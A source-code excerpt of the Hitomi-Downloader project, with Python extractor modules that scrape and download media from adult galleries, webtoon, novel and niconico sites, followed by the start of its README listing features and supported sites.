def read(self): video = Video(self.url, cw=self.cw) video.url()# get thumb self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) # get best video fs = info['formats'] fs = sorted(fs, key=lambda x: int(x['width']), reverse=True) f = fs[0] url_video = f['url'] # thumb self.thumb_url = info['thumbnails'][0]['url'] self.thumb = BytesIO() downloader.download(self.thumb_url, buffer=self.thumb) # m3u8 print(f['protocol']) if 'm3u8' in f['protocol']: url_video = M3u8_stream(url_video, referer=url) # title & filename self.title = info['title'] self.filename = format_filename(self.title, info['id'], '.mp4') self._url = url_video return self._url File: src/extractor/hentaicosplay_downloader.py #coding: utf8 import downloader from utils import Downloader, Session, Soup, LazyUrl, urljoin, get_ext, clean_title, try_n, limits import utils import ree as re from translator import tr_ import clf2 from m3u8_tools import M3u8_stream from timee import sleep import os class Image: def __init__(self, url, referer, p, session): self._url = url self._referer = referer self._p = p self.url = LazyUrl(url, self.get, self) self.session = session @try_n(3, 5) @limits(1) def get(self, _=None): soup = downloader.read_soup(self._url, self._referer, session=self.session) div = soup.find('div', id='display_image_detail') or soup.find('ul', id='detail_list') parent = div.find('img').parent while not parent.get('href'): parent = parent.parent url = urljoin(self._url, parent['href']) ext = get_ext(url) self.filename = '{:04}{}'.format(self._p, ext) return url, self._url class Video: def __init__(self, src, referer, title, session): ext = get_ext(src) if ext == '.m3u8': _src = src src = M3u8_stream(_src, referer=referer, session=session) ext = '.mp4' self.url = LazyUrl(referer, lambda _: src, self) self.filename = '{}{}'.format(clean_title(title), ext) class Downloader_hentaicosplay(Downloader): type = 'hentaicosplay' URLS = ['hentai-cosplays.com', 'porn-images-xxx.com', 'hentai-img.com'] icon = None display_name = 'Hentai Cosplay' MAX_PARALLEL = 1 # must be 1 MAX_CORE = 4 ACCEPT_COOKIES = [rf'(.*\.)?{domain}' for domain in URLS] @classmethod def fix_url(cls, url): url = re.sub(r'/page/[0-9]+', '', url) url = re.sub(r'/attachment/[0-9]+', '', url) url = re.sub(r'([a-zA-Z]+\.)hentai-cosplays\.com', 'hentai-cosplays.com', url) url = re.sub(r'.com/story/', '.com/image/', url) return url def init(self): self.session = Session() @try_n(2) def read(self): #4961 ua = downloader.random_ua() self.print_(f'read start ua: {ua}') downloader.REPLACE_UA[r'hentai-cosplays\.com'] = ua downloader.REPLACE_UA[r'porn-images-xxx\.com'] = ua if '/video/' in self.url: res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) title = (soup.find('h1', id='post_title') or soup.find('div', id='page').find('h2')).text.strip() self.title = title view = soup.find('div', id='post') or soup.find('div', class_='video-container') video = view.find('video') src = video.find('source')['src'] src = urljoin(self.url, src) video = Video(src, self.url, title, self.session) self.urls.append(video.url) self.single = True return if '/image/' not in self.url: raise NotImplementedError('Not a post') res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) title = 
(soup.find('h2') or soup.find('h3')).text paginator = soup.find('div', id='paginator') or soup.find('div', class_='paginator_area') pages = [self.url] for a in paginator.findAll('a'): href = a.get('href') if not href: continue href = urljoin(self.url, href) if href not in pages: pages.append(href) self.print_(f'pages: {len(pages)}') imgs = [] for i, page in enumerate(pages): sleep(2, self.cw) if page == self.url: soup_page = soup else: soup_page = try_n(3, 5)(downloader.read_soup)(page, session=self.session) view = soup_page.find('div', id='post') or soup_page.find('ul', id='detail_list') for img in view.findAll('img'): href = img.parent.get('href') or img.parent.parent.get('href') if not href: continue href = urljoin(page, href) img = Image(href, page, len(imgs), self.session) imgs.append(img) self.print_(f'imgs: {len(imgs)}') self.cw.setTitle('{} {} ({} / {})'.format(tr_('읽는 중...'), title, i+1, len(pages))) names = {} dirname = utils.dir(self.type, clean_title(title), self.cw) try: files = os.listdir(dirname) except: files = [] for file in files: name, ext = os.path.splitext(file) names[name] = ext for p, img in enumerate(imgs): name = '{:04}'.format(p) ext = names.get(name) if ext: self.urls.append(os.path.join(dirname, '{}{}'.format(name, ext))) else: self.urls.append(img.url) self.title = clean_title(title) File: src/extractor/tokyomotion_downloader.py #coding:utf8 import downloader from utils import Soup, Downloader, LazyUrl, clean_title, format_filename from io import BytesIO import ree as re import os class Downloader_tokyomotion(Downloader): type = 'tokyomotion' URLS = ['tokyomotion.net'] single = True _type = None display_name = 'TOKYO Motion' ACCEPT_COOKIES = [r'(.*\.)?tokyomotion\.net'] def init(self): html = downloader.read_html(self.url) self.soup = Soup(html) if '/album/' in self.url: self._type = 'album' else: self._type = 'video' @property def name(self): title = get_title(self.soup) return clean_title(title) def read(self): if self._type == 'video': video = get_video(self.url, self.soup) self.urls.append(video.url) self.setIcon(video.thumb) elif self._type == 'album': imgs = get_imgs(self.url) for img in imgs: self.urls.append(img.url) self.single = False else: raise NotImplementedError('Unknown type: {}'.format(self._type)) self.title = self.name class Video: def __init__(self, url, url_thumb, referer, filename): self.url = LazyUrl(referer, lambda x: url, self) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(url_thumb, referer=referer, buffer=self.thumb) self.filename = filename def get_title(soup): video = soup.find('video', id='vjsplayer') if video: title = soup.find('h3').text.strip() else: title = soup.find('title').text.split(' Album - ')[0].strip() return title def get_video(url, soup=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) video = soup.find('video', id='vjsplayer').find('source').attrs['src'] url_thumb = soup.find('video', id='vjsplayer').attrs['poster'] title = get_title(soup) filename = format_filename(title, '', '.mp4') video = Video(video, url_thumb, url, filename) return video class Image: def __init__(self, url, referer): self.url = LazyUrl(referer, lambda x: url, self) self.filename = os.path.basename(url.split('?')[0]) def get_imgs(url): id = re.find('album/.*?([0-9]+)', url) print('id:', id) url = 'https://www.tokyomotion.net/album/slideshow/{}'.format(id) html = downloader.read_html(url) soup = Soup(html) imgs = [] for a in soup.findAll('a', {'data-lightbox': 'slideshow-{}'.format(id)}): img = 
a.find('img').attrs['src'] img = img.replace('/tmb/', '/') img = Image(img, url) imgs.append(img) return imgs File: src/extractor/syosetu_downloader.py #coding:utf8 import downloader import utils from utils import urljoin, try_n, Downloader, clean_title, Session, File, check_alive, get_max_range import ree as re from io import BytesIO import os from translator import tr_ from timee import sleep class Text(File): type = 'syosetu' format = 'title' def __init__(self, info): title = info['subtitle'] if not info['single']: p = int(re.findall('/([0-9]+)', info['referer'])[-1]) title = clean_title(f'[{p:04}] {title}') info['title_all'] = title d = { 'title': info['title_all'], } info['name'] = utils.format(self.type, d, '.txt') super().__init__(info) def get(self): text = get_text(self['referer'], self['title_all'], self['update'], self.session) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return {'url': f} def get_id(url): return re.find(r'.com/([^/]+)', url) or url class Downloader_syosetu(Downloader): type = 'syosetu' URLS = ['syosetu.com'] MAX_CORE = 2 detect_removed = False display_name = '小説家になろう' ACCEPT_COOKIES = [r'(.*\.)?syosetu\.com'] atts = ['_title_', 'novel_ex'] @classmethod def fix_url(cls, url): return f'https://ncode.syosetu.com/{get_id(url)}/' def read(self): for try_ in range(8): self.print_('get_session') try: self.session = get_session() self.purge_cookies() soup = downloader.read_soup(self.url, session=self.session) get_title_artist(soup) break except Exception as e: print(e) else: raise title, self.artist = get_title_artist(soup) self._title_ = title ncode = re.find(r'syosetu.com/([^/]+)', self.url, err='no ncode') #3938 title_dir = clean_title(f'[{self.artist}] {title} ({ncode})') ex = soup.find('div', id='novel_ex') self.novel_ex = utils.get_text(ex, '') if ex else None texts = [] # Range max_pid = get_max_range(self.cw) while check_alive(self.cw): subtitles = soup.findAll('dd', class_='subtitle') if subtitles: for subtitle in subtitles: update = subtitle.parent.find('dt', class_='long_update') update2 = None if update: for span in update.findAll('span'): update2 = span.attrs['title'] span.decompose() update = update.text.strip() if update2: update += f' ({update2})' a = subtitle.find('a') subtitle = a.text.strip() href = urljoin(self.url, a.attrs['href']) if not re.search(f'ncode.syosetu.com/{get_id(self.url)}/[0-9]+', href): self.print_(f'skip: {href}') continue text = Text({'referer': href, 'subtitle': subtitle, 'update': update, 'single': False}) texts.append(text) else: self.single = True text = Text({'referer': self.url, 'subtitle': title_dir, 'update': None, 'single': True}) texts.append(text) if len(texts) >= max_pid: break if pager_next := soup.find('a', class_='novelview_pager-next'): #6830 sleep(1) url_next = urljoin(self.url, pager_next['href']) self.print_(f'url_next: {url_next}') soup = downloader.read_soup(url_next, self.url, session=self.session) else: break self.print_(f'single: {self.single}') self.urls += texts self.title = title_dir def post_processing(self): if self.single: return names = self.cw.names filename = os.path.join(self.dir, f'[merged] {self.title}.txt') try: with utils.open(filename, 'wb') as f: f.write(f' {self._title_}\n\n \u4f5c\u8005\uff1a{self.artist}\n\n\n'.encode('utf8')) if self.novel_ex: f.write(self.novel_ex.encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat(f'[%v/%m] {tr_("병합...")} [{i}/{len(names)}]') with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: 
self.cw.pbar.setFormat("[%v/%m]") def get_title_artist(soup): artist = soup.find('div', class_='novel_writername').text.replace('\u4f5c\u8005', '').replace('\uff1a', '').replace(':', '').replace('\u3000', ' ').strip() rem = len(artist.encode('utf8', 'ignore')) + len('[merged] [] .txt') + len(' (n8273ds)') return clean_title(soup.find('p', class_='novel_title').text.strip(), n=-rem), clean_title(artist) @try_n(22, sleep=30) def get_text(url, subtitle, update, session): soup = downloader.read_soup(url, session=session) if update: update = ' ' + update else: update = '' story = utils.get_text(soup.find('div', id='novel_honbun'), '') p = soup.find('div', id='novel_p') p = '' if p is None else utils.get_text(p, '') if p: story = f'{p}\n\n════════════════════════════════\n\n{story}' #2888 a = soup.find('div', id='novel_a') a = '' if a is None else utils.get_text(a, '') if a: story = f'{story}\n\n════════════════════════════════\n\n{a}' text = f'''──────────────────────────────── ◆ {subtitle}{update} ──────────────────────────────── {story}''' return text def get_session(): session = Session() session.cookies.set(name='over18', value='yes', path='/', domain='.syosetu.com') return session File: src/extractor/bdsmlr_downloader.py #coding:utf8 import downloader from utils import Session, Soup, LazyUrl, Downloader, get_max_range, try_n, get_print, clean_title, check_alive from datetime import datetime import ree as re import os from translator import tr_ from error_printer import print_error import clf2 import errors class Downloader_bdsmlr(Downloader): type = 'bdsmlr' URLS = ['bdsmlr.com'] display_name = 'BDSMlr' ACCEPT_COOKIES = [r'(.*\.)?bdsmlr\.com'] def init(self): if 'bdsmlr.com/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self.url = 'https://{}.bdsmlr.com'.format(self.id_) self.session = Session() clf2.solve(self.url, session=self.session, cw=self.cw) @property def id_(self): url = self.url if 'bdsmlr.com' in url: if 'www.bdsmlr.com' in url: raise Exception('www.bdsmlr.com') gal_num = url.split('.bdsmlr.com')[0].split('/')[(-1)] else: gal_num = url return gal_num def read(self): info = get_imgs(self.id_, session=self.session, cw=self.cw) for post in info['posts']: self.urls.append(post.url) self.title = '{} (bdsmlr_{})'.format(clean_title(info['username']), self.id_) class Post: def __init__(self, url, referer, id, p): self.id = id self.url = LazyUrl(referer, lambda x: url, self) ext = os.path.splitext(url)[1] self.filename = '{}_p{}{}'.format(id, p, ext) def foo(url, soup, info, reblog=False): #print('foo', info['c'], len(info['ids'])) for post in soup.findAll('div', class_='wrap-post'): try: id = int(re.find('[0-9]+', post.attrs['class'][1])) except Exception as e: print(print_error(e)) continue if id in info['ids']: continue info['ids'].add(id) info['last'] = id if not reblog and post.find('div', class_='ogname'): continue for p, mag in enumerate(post.findAll(['a', 'div'], class_='magnify')): post = Post(mag.attrs['href'], url, id, p) info['posts'].append(post) info['c'] += 20 if info['c'] else 5 @try_n(2) def get_imgs(user_id, session, cw=None): print_ = get_print(cw) url = 'https://{}.bdsmlr.com/'.format(user_id) info = {'c': 0, 'posts': [], 'ids': set()} html = downloader.read_html(url, session=session) soup = Soup(html) sorry = soup.find('div', class_='sorry') if sorry: raise Exception(sorry.text.strip()) username = soup.find('title').text.strip()### print('username:', username) info['username'] = username token = soup.find('meta', {'name': 
'csrf-token'}).attrs['content'] print_('token: {}'.format(token)) max_pid = get_max_range(cw) n = len(info['ids']) for p in range(1000): check_alive(cw) if p == 0: url_api = 'https://{}.bdsmlr.com/loadfirst'.format(user_id) else: url_api = 'https://{}.bdsmlr.com/infinitepb2/{}'.format(user_id, user_id) data = { 'scroll': str(info['c']), 'timenow': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), } if 'last' in info: data['last'] = str(info['last']) print_('n:{}, scroll:{}, last:{}'.format(len(info['posts']), data['scroll'], data.get('last'))) headers = { 'Referer': url, 'X-CSRF-TOKEN': token, } _e = None for try_ in range(4): try: r = session.post(url_api, data=data, headers=headers) if p == 0: r.raise_for_status() break except Exception as e: _e = e print(e) else: if _e is not None: raise _e soup = Soup(r.text) foo(url, soup, info) if len(info['ids']) == n: print('same; break') break n = len(info['ids']) s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), username, user_id, len(info['posts'])) if cw is not None: cw.setTitle(s) else: print(s) if len(info['posts']) > max_pid: break return info File: src/extractor/webtoon_downloader.py import downloader from utils import Soup, Session, LazyUrl, clean_title, get_ext, get_imgs_already, urljoin, try_n, Downloader, check_alive import page_selector from translator import tr_ import ree as re import clf2 class Downloader_webtoon(Downloader): type = 'webtoon' URLS = ['webtoon.com', 'webtoons.com'] MAX_CORE = 8 MAX_SPEED = 4.0 display_name = 'WEBTOON' ACCEPT_COOKIES = [r'(.*\.)?webtoons?\.com'] def init(self): self.session = Session() clf2.solve(self.url, session=self.session) self.url = get_main(self.url, self.session) self.soup = downloader.read_soup(self.url, session=self.session) @classmethod def fix_url(cls, url): return url.replace('webtoon.com', 'webtoons.com') def read(self): title = clean_title(self.soup.find('h1').text.strip()) self.title = tr_('읽는 중... 
{}').format(title) imgs = get_imgs_all(self.url, self.session, title, cw=self.cw) for img in imgs: if isinstance(img, Image): self.urls.append(img.url) else: self.urls.append(img) self.title = title class Page: def __init__(self, url, title): self.url = url self.title = title class Image: def __init__(self, url, session, page, p): ext = get_ext(url) or downloader.get_ext(url, referer=page.url, session=session) self.filename = '{}/{:04}{}'.format(clean_title(page.title), p, ext) self.url = LazyUrl(page.url, lambda _: url, self) @try_n(2) def get_imgs(page, session): html = downloader.read_html(page.url, session=session) if 'window.__motiontoonViewerState__' in html: raise NotImplementedError('motiontoon') soup = Soup(html) view = soup.find('div', class_='viewer_img') imgs = [] for img in view.findAll('img'): src = img.get('data-url') or img['src'] img = Image(urljoin(page.url, src), session, page, len(imgs)) imgs.append(img) return imgs def get_main(url, session): if 'episode_no=' in url: soup = downloader.read_soup(url, session=session) url = urljoin(url, soup.find('div', class_='subj_info').find('a')['href']) return url def set_page(url, p): if '&page=' not in url: url = url + '&page={}'.format(p) else: url = re.sub('&page=[0-9]+', '&page={}'.format(p), url) if p == 1: url = url.replace('&page=1', '') return url def get_pages(url, session=None): pages = [] urls = set() for p in range(1, 101): url_page = set_page(url, p) print(url_page) for try_ in range(4): try: soup = downloader.read_soup(url_page, session=session) view = soup.find('ul', id='_listUl') if view is None: raise Exception('no view') break except Exception as e: e_ = e print(e) else: raise e_ pages_new = [] for li in view.findAll('li', recursive=False): href = urljoin(url, li.find('a')['href']) title = li.find('span', class_='subj').text.strip() if href in urls: continue urls.add(href) no = int(li['data-episode-no']) title = '{:04} - {}'.format(no, title) page = Page(href, title) pages_new.append(page) if not pages_new: break pages += pages_new return pages[::-1] @page_selector.register('webtoon') @try_n(4) def f(url): url = get_main(url, None) return get_pages(url) def get_imgs_all(url, session, title, cw=None): pages = get_pages(url, session) pages = page_selector.filter(pages, cw) imgs = [] for p, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('webtoon', title, page, cw) if imgs_already: imgs += imgs_already continue imgs += get_imgs(page, session) msg = tr_('읽는 중... 
{} / {} ({}/{})').format(title, page.title, p + 1, len(pages)) if cw is not None: cw.setTitle(msg) else: print(msg) return imgs File: src/extractor/avgle_downloader.py #coding: utf8 import downloader from m3u8_tools import M3u8_stream from utils import Soup, Downloader, LazyUrl, get_print, try_n, check_alive, format_filename, json from io import BytesIO import base64 import webbrowser import errors class Downloader_avgle(Downloader): type = 'avgle' single = True URLS = ['avgle.com'] ACCEPT_COOKIES = [r'(.*\.)?avgle\.com'] def init(self): if not self.cw.data_: link = 'https://github.com/KurtBestor/Hitomi-Downloader/wiki/Chrome-Extension' webbrowser.open(link) raise errors.Invalid('No data; See: {}'.format(link)) def read(self): video = get_video(self.url, cw=self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title @try_n(2) def get_video(url, cw=None): print_ = get_print(cw) check_alive(cw) data = cw.data_ version = data['version'] print_('version: {}'.format(version)) if version == '0.1': raise errors.OutdatedExtension() data = data['data'] if not isinstance(data, bytes): data = data.encode('utf8') s = base64.b64decode(data).decode('utf8') urls = json.loads(s) print_('\n'.join(urls[:4])) referer_seg = 'auto' if 'referer=force' in urls[0] else None # 1718 stream = M3u8_stream(url, urls=urls, n_thread=4, referer_seg=referer_seg) html = downloader.read_html(url) soup = Soup(html) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] title = soup.find('meta', {'property': 'og:title'}).attrs['content'].strip() video = Video(stream, url_thumb, url, title) return video class Video: def __init__(self, url, url_thumb, referer, title): self.url = LazyUrl(referer, lambda x: url, self) self.url_thumb = url_thumb self.thumb = BytesIO() downloader.download(url_thumb, referer=referer, buffer=self.thumb) self.title = title self.filename = format_filename(title, '', '.mp4') File: src/extractor/nhentai_downloader.py #coding:utf8 import downloader import ree as re from utils import urljoin, File, Downloader, try_n, join, get_ext, json import utils import clf2 def get_id(url): try: return int(url) except: return int(re.find('/g/([0-9]+)', url)) class File_nhentai(File): type = 'nhentai' format = 'page:04;' class Downloader_nhentai(Downloader): type = 'nhentai' URLS = ['nhentai.net'] MAX_CORE = 16 display_name = 'nhentai' ACCEPT_COOKIES = [r'(.*\.)?nhentai\.net'] def init(self): self.session = clf2.solve(self.url, cw=self.cw)['session'] #4541 @classmethod def fix_url(cls, url): return f'https://nhentai.net/g/{get_id(url)}/' def read(self): info, imgs = get_imgs(get_id(self.url), self.session) # 1225 artist = join(info.artists) self.artist = artist if info.artists else None group = join(info.groups) lang = info.lang or 'N/A' series = info.seriess[0] if info.seriess else 'N/A' title = self.format_title(info.type, info.id, info.title, artist, group, series, lang) self.urls += imgs self.title = title class Info: def __init__(self, host, id, id_media, title, p, artists, groups, seriess, lang, type, formats): self.host = host self.id = id self.id_media = id_media self.title = title self.p = p self.artists = artists self.groups = groups self.seriess = seriess self.lang = lang self.type = type self.formats = formats @try_n(4) def get_info(id, session): url = f'https://nhentai.net/g/{id}/1/' referer = f'https://nhentai.net/g/{id}/' html = downloader.read_html(url, referer, session=session) data = html.split('JSON.parse(')[1].split(');')[0] gal = 
json.loads(json.loads(data)) host = 'https://i.nhentai.net'#re.find('''media_url: *['"]([^'"]+)''', html, err='no host') id = int(gal['id']) id_media = int(gal['media_id']) title = gal['title']['english'] p = len(gal['images']['pages']) artists = [] groups = [] seriess = [] for tag in gal['tags']: type = tag['type'] if type == 'artist': artists.append(tag['name']) elif type == 'group': groups.append(tag['name']) elif type == 'parody' and tag['name'] != 'original': seriess.append(tag['name']) elif type == 'language': lang = tag['name'] elif type == 'category': type_ = tag['name'] formats = [] for img in gal['images']['pages']: type = img['t'] format = {'j':'jpg', 'p':'png', 'g':'gif'}[type] formats.append(format) info = Info(host, id, id_media, title, p, artists, groups, seriess, lang, type_, formats) return info def get_imgs(id, session): info = get_info(id, session) imgs = [] for p in range(1, info.p+1): name = f'/galleries/{info.id_media}/{p}.{info.formats[p-1]}' url_page = f'https://nhentai.net/g/{id}/{p}/' url_img = urljoin(info.host, name) ext = get_ext(url_img) d = { 'page': p, } img = File_nhentai({'url': url_img, 'referer': url_page, 'name': utils.format('nhentai', d, ext)}) imgs.append(img) return info, imgs File: src/extractor/nico_downloader.py #coding:utf8 import downloader from io import BytesIO import ree as re from utils import Downloader, get_print, format_filename, try_n, LazyUrl, get_abr, Session, get_resolution, print_error, urljoin import utils import ffmpeg import os import ytdl import threading import errors import websockets # for nama from m3u8_tools import M3u8_stream def get_id(url): if '/watch/' in url: return re.find('/watch/([a-zA-Z0-9]+)', url) class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://account.nicovideo.jp/login') class Video: def __init__(self, session, info, format, cw, hb=None, d=None, live=False, ydl=None): self.session = session self.info = info self.title = info.get('fulltitle') or info['title'] self.ext = info['ext'] self.id = info['id'] self.format = format self.username = info['uploader'] self.url = LazyUrl(f'https://www.nicovideo.jp/watch/{self.id}', self.get, self, pp=self.pp) self.cw = cw self.hb = hb self.d = d self.live = live self.ydl = ydl self.filename = format_filename(self.title, self.id, self.ext, live=live, artist=self.username) self.url_thumb = info['thumbnail'] print('thumb:', self.url_thumb) self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) def get(self, _): print_ = get_print(self.cw) hb = self.hb if hb: heartbeat_info_dict = hb['info'] heartbeat_url = heartbeat_info_dict['url'] heartbeat_data = heartbeat_info_dict['data'].encode() heartbeat_interval = heartbeat_info_dict.get('interval', 30) request = ytdl.get_ytdl().utils.sanitized_Request(heartbeat_url, heartbeat_data) def heartbeat(): if self.d.status == 'stop': print_('Heartbeat end') return try: hb['ydl'].urlopen(request).read() except Exception as e: e_msg = print_error(e) print_(f'Heartbeat failed:\n{e_msg}') self.timer = threading.Timer(heartbeat_interval, heartbeat) self.timer.start() heartbeat_info_dict['ping']() print_('Heartbeat with %d second interval ...' 
% heartbeat_interval) heartbeat() url = self.info['url'] if self.live: url = ytdl.Downloader(self.ydl, self.info, self.info['format_'], live=True, cw=self.cw) return url def pp(self, filename): if self.format == 'mp4': return name, ext_old = os.path.splitext(filename) filename_new = f'{name}.mp3' ffmpeg.convert(filename, filename_new, f'-shortest -preset ultrafast -b:a {get_abr()}k', cw=self.cw) if utils.ui_setting.albumArt.isChecked(): self.thumb.seek(0)# ffmpeg.add_cover(filename_new, self.thumb, {'artist':self.username, 'title':self.title}, cw=self.cw) return filename_new def __repr__(self): return f'Video({self.id})' def suitable(url): if 'nicovideo.jp' not in url.lower(): return False if 'nicovideo.jp/user/' in url.lower(): return True return get_id(url) is not None class Downloader_nico(Downloader): type = 'nico' single = True URLS = [suitable, 'ch.nicovideo.jp'] display_name = 'Niconico' _format = 'mp4' MAX_SPEED = 2.0 ACCEPT_COOKIES = [r'(.*\.)?nicovideo\.jp'] @classmethod def fix_url(cls, url): id_ = get_id(url) if not id_: return url.split('?')[0].split('#')[0] if re.find(r'^https?://', id_): return url if re.find(r'^https?://', url): domain = utils.domain(url) else: domain = 'www.nicovideo.jp' return f'https://{domain}/watch/{id_}' def init(self): self.session = Session('chrome') self.url0 = self.url if not get_id(self.url): self.url = get_live_from_user(self.url, self.session) def read(self): if self.cw.format: self._format = self.cw.format if self._format == 'mp3': self.cw.setMusic(True) video = get_video(self.session, self.url, self._format, self.cw, self) self.urls.append(video.url) self.setIcon(video.thumb) self.title = os.path.splitext(video.filename)[0].replace(':', ':') self.artist = video.username if video.live: d = {} d['url'] = self.url0 d['title'] = video.username d['thumb'] = video.thumb.getvalue() utils.update_live(d, self.cw) else: self.enableSegment() @try_n(2) def get_video(session, url, format, cw=None, d=None): print_ = get_print(cw) live = 'live.nico' in url if cw and live: cw.live = True# options = { 'noplaylist': True, #'extract_flat': True, 'playlistend': 1, } ydl = ytdl.YoutubeDL(options, cw=cw) try: info = ydl.extract_info(url) except Exception as e: e_ = e soup = downloader.read_soup(url, session=session) box = soup.find('div', class_='channel-invitation-box') if box: msg = box.find('p', class_='channel-invitation-box-body-channel-desc-msg1') if msg: msg = msg.text.strip() raise LoginRequired(msg or None) else: raise e_ fs = info['formats'] res = max(get_resolution(), min(f.get('height', 0) for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f.get('height', 0) <= res] for f in fs: print_(f"{f.get('height')} {f['protocol']} {f['format']} - {f['url']}") ## if not live: ## fs = [f for f in fs if f['url'].startswith('niconico_dm')]# f = fs[-1] print_(f'f_url: {f["url"]}') if f['url'].startswith('niconico_dmc:'): ie = ytdl.get_extractor(url) ie._downloader = ydl info_dict, heartbeat_info_dict = ie._get_heartbeat_info(f) f = info_dict hb = {'info': heartbeat_info_dict, 'ydl': ydl} elif f['url'].startswith('niconico_dms:'): ie = ytdl.get_extractor(url) ie._downloader = ydl url_m3u8 = ie._get_dms_manifest_url(info) print_(f'url_m3u8: {url_m3u8}') f['url'] = url_m3u8 f['protocol'] = 'm3u8' _ = info.copy() _['formats'] = [f] m = ytdl.Downloader(ydl, _, _, cw=cw) f['url'] = m hb = None elif f['protocol'].startswith('m3u8'): m = M3u8_stream(f['url'], referer=url, session=session) ## session.headers.update(f.get('http_headers', {})) ## hdr = 
session.headers.copy() ## m = ffmpeg.Stream(f['url'], headers=hdr, cw=cw) f['url'] = m hb = None else: hb = None session.headers.update(f.get('http_headers', {})) info['url'] = f['url'] info['format_'] = f video = Video(session, info, format, cw, hb=hb, d=d, live=live, ydl=ydl) return video import selector @selector.options('nico') def options(urls): return [ {'text': 'MP4 (동영상)', 'format': 'mp4'}, {'text': 'MP3 (음원)', 'format': 'mp3'}, ] def get_live_from_user(url, session): if 'ch.nicovideo.jp' in url: cid = re.find(r'ch\.nicovideo\.jp/([^/?#]+)', url) url = f'https://ch.nicovideo.jp/{cid}/live' soup = downloader.read_soup(url, session=session) if live_now := soup.find(id='live_now'): return urljoin(url, live_now.find('a')['href']) raise Exception('no live') elif 'nicovideo.jp/user/' in url: cid = re.find(r'nicovideo\.jp/user/([^/?#]+)', url) d = downloader.read_json(f'https://live.nicovideo.jp/front/api/v1/user-broadcast-history?providerId={cid}&providerType=user&isIncludeNonPublic=false&offset=0&limit=100&withTotalCount=true', session=session) for pg in d['data']['programsList']: if pg['program']['schedule']['status'] == 'ON_AIR': id_ = pg['id']['value'] return f'https://live.nicovideo.jp/watch/{id_}' raise Exception('no live') else: raise NotImplementedError(url) class Live_nico(utils.Live): type = 'nico' @classmethod def is_live(cls, url): if 'nicovideo.jp/user/' in url.lower(): return True if 'ch.nicovideo.jp' in url.lower(): return True @classmethod def fix_url(cls, url): if 'nicovideo.jp/user/' in url.lower(): return '/'.join(url.split('/')[:5]).split('?')[0].split('#')[0] return '/'.join(url.split('/')[:4]).split('?')[0].split('#')[0] @classmethod def check_live(cls, url, info=None): try: session = Session('chrome') get_live_from_user(url, session) return True except Exception as e: print(e) return False
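The extractor modules above all follow the same plugin pattern: subclass `Downloader`, declare `type`, `URLS`, and `ACCEPT_COOKIES`, then fill `self.urls` and `self.title` inside `read()`. The sketch below is illustrative only and is not part of the repository; the class name, `type` value, site (`example.com`), and HTML selectors are hypothetical, and it assumes the target page exposes plain `<img>` tags.

```py
import downloader
from utils import Downloader, clean_title, urljoin


class Downloader_example(Downloader):  # hypothetical extractor, for illustration only
    type = 'example'                   # extractor identifier
    URLS = ['example.com']             # URL fragments this extractor accepts
    ACCEPT_COOKIES = [r'(.*\.)?example\.com']

    def read(self):
        # read_soup / clean_title / urljoin are the helpers used by the extractors above
        soup = downloader.read_soup(self.url)
        title = clean_title(soup.find('h1').text.strip())
        for img in soup.findAll('img'):
            self.urls.append(urljoin(self.url, img['src']))
        self.title = title
```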
<p align="center"> <img src="imgs/card_crop.png" width="50%"/> <br> </p> [![GitHub release](https://img.shields.io/github/release/KurtBestor/Hitomi-Downloader.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) [![GitHub downloads](https://img.shields.io/github/downloads/KurtBestor/Hitomi-Downloader/latest/total.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) [![GitHub downloads](https://img.shields.io/github/downloads/KurtBestor/Hitomi-Downloader/total.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases) ## Links - [Download](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) - [Issues](https://github.com/KurtBestor/Hitomi-Downloader/issues) - [Scripts & Plugins](https://github.com/KurtBestor/Hitomi-Downloader/wiki/Scripts-&-Plugins) - [Chrome Extension](https://github.com/KurtBestor/Hitomi-Downloader/wiki/Chrome-Extension) ## Demo <img src="imgs/how_to_download.gif"> ## Features - 🍰 Simple and clear user interface - 🚀 Download acceleration - 💻 Supports 24 threads in a single task - 🚥 Supports speed limit - 📜 Supports user scripts - 🧲 Supports BitTorrent & Magnet - 🎞️ Supports M3U8 & MPD format videos - 🌙 Dark mode - 🧳 Portable - 📋 Clipboard monitor - 🗃️ Easy to organize tasks ## Supported Sites | Site | URL | | :--: | -- | | **4chan** | <https://4chan.org> | | **AfreecaTV** | <https://afreecatv.com> | | **ArtStation** | <https://artstation.com> | | **AsmHentai** | <https://asmhentai.com> | | **Avgle** | <https://avgle.com> | | **baraag.net** | <https://baraag.net> | | **半次元** | <https://bcy.net> | | **BDSMlr** | <https://bdsmlr.com> | | **bilibili** | <https://bilibili.com> | | **ComicWalker** | <https://comic-walker.com> | | **Coub** | <https://coub.com> | | **Danbooru** | <https://danbooru.donmai.us> | | **Kakao Webtoon** | <http://webtoon.kakao.com> | | **DeviantArt** | <https://deviantart.com> | | **E(x)Hentai Galleries** | <https://e-hentai.org><br><https://exhentai.org> | | **Facebook** | <https://facebook.com> | | **FC2 Video** | <https://video.fc2.com> | | **Flickr** | <https://flickr.com> | | **Gelbooru** | <https://gelbooru.com> | | **Hameln** | <https://syosetu.org> | | **hanime.tv** | <https://hanime.tv> | | **Hentai Foundry** | 